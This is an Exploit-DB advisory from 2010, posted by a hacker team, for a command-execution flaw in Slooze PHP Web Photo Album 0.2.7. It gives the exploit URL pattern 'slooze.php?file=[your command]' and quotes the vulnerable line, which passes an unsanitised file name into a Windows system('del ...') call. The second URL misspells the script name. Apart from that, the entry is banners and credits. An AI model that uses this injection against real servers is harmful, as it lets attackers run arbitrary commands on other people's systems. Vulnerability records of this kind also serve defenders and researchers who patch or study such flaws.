Slooze PHP Web Photo Album 0.2.7 - Command Execution

EDB-ID:

12515

CVE:



Platform:

PHP

Published:

2010-05-05

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
 0     _                   __           __       __                     1 
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
 1                  \ \____/ >>Remote Command Execution Vulnerability   0 
 0                   \/___/                                                                     1 
 1                                                                      1 
 0                               0 
 1                        1 
 0                                                                      0 
 1                    ########################################          1 
 0                                                         Sn!pEr Team          1 
 1                    ########################################          0 
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
  (slooze.php) Command Execution Vulnerability

 #[+] Author : Sn!pEr.S!Te hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] T34M Sn!pEr.S!Te Hacker  #

#[+] Site            : www.v4-team.com/cc  and www.sa-hacker.com     
# [+] 5-5-2010                                 #
# [+] Script : slooze-0.2.7                   #
# [+] Download: http://sourceforge.net/projects/slooze/files/slooze/0.2.7/slooze-0.2.7.zip/download #
# Version: [0.2.7] #
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#
Exploit :src/slooze.php
http://localhost/src/slooze.php?file= [your command]


http://127.0.0.1/src/slooz.php?file=[your command]
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1#

system('del "' . $this->cachePath . $file . '"');   /* Windows platforms */

line :1003

 

my  friend : liar -ysefe - Dj - sm hacker-baby hacker-dmar Hacker